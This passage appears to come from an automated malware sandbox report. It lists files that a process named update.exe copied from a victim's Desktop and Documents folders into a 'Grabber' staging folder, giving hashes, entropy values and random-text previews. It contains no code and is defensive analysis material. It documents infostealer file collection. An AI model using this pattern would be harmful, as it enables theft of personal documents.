                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.514693737970008
                                                  Encrypted:false
                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
